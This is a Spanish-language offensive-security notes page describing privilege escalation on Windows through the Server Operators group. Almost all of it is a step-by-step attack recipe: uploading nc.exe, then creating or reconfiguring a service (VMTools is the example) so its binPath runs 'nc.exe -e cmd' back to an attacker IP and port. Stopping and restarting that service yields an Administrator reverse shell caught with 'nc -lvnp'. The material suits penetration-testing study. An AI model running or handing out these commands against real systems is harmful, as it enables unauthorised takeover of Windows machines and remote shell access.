A.D. Group Server Operators

Estando dentro de este grupo y pudiendo para y correr servicios del sistema se puede escalar privilegios de la siguiente manera...

Primero veremos en nuestro host donde esta el nc.exe para que sirva en Windows....

locate nc.exe

Info:

/usr/share/windows-resources/binaries/nc.exe

Nos copiamos ese .exe a nuestro directorio actual para pasarlo a la maquina Windows...

cp /usr/share/windows-resources/binaries/nc.exe .

Hacemos un pwd para ver en la ruta actual en la que estamos y en la que hemos llevado el archivo, en mi caso...

/home/kali/Desktop

Por lo que en la maquina Windows haremos lo siguiente para pasarnoslo...

upload /home/kali/Desktop/nc.exe

Una vez hecho esto ya estaria el nc.exe ya estaria en la maquina Windows...

Ahora lo que haremos sera arrancar un servicio ya que estamos en el grupo para poder hacerlo, de la siguiente manera haciendo una reverse shell y como lo esta ejecutando por asi decirlo el administrador conseguiriamos una shell como el mismo...

sc.exe create reverse binPath="C:\<PATH>\nc.exe -e cmd <IP> <PORT>"

Con esto lo que estamos haciendo es crear un servicio de que cuando se inicie cierto servicio arranque el nc.exe que se encuentra en ese PATH ejecutando el mismo una Reverse Shell con los siguientes paraemtros...

Ahora nos pondremos a la escucha...

nc -lvnp <PORT>

Pero si al crear eso nos pone Access Denied manipularemos un servicio que ya este creado de la siguiente manera...

Lo miraremos con services los servicios que estan abiertos y eligiendo uno de ellos le cambiaremos la configuracion de la siguiente manera...

sc.exe config <SERVICE_NAME> binPath="C:\<PATH>\nc.exe -e cmd <IP> <PORT>"

EJEMPLO

sc.exe config VMTools binPath="C:\<PATH>\nc.exe -e cmd <IP> <PORT>"

A lo mejor no te deja con todos los servicios pero es ir probando hasta que te deje cambiarle la configuracion alguno de ellos...

Si encontramos uno que te deje cambiar la configuracion, haremos lo siguiente...

sc.exe stop <SERVICE_NAME>
sc.exe stop VMTools

Y ahora estaremos a la escucha...

nc -lvnp <PORT>

Ahora en la maquina Windows iniciamos el servicio para que se inicie la Reverse Shell...

sc.exe start <SERVICE_NAME>
sc.exe start VMTools

Y con esto ya habriamos conseguido una Reverse Shell como Administrador en la maquina Windows...

Last updated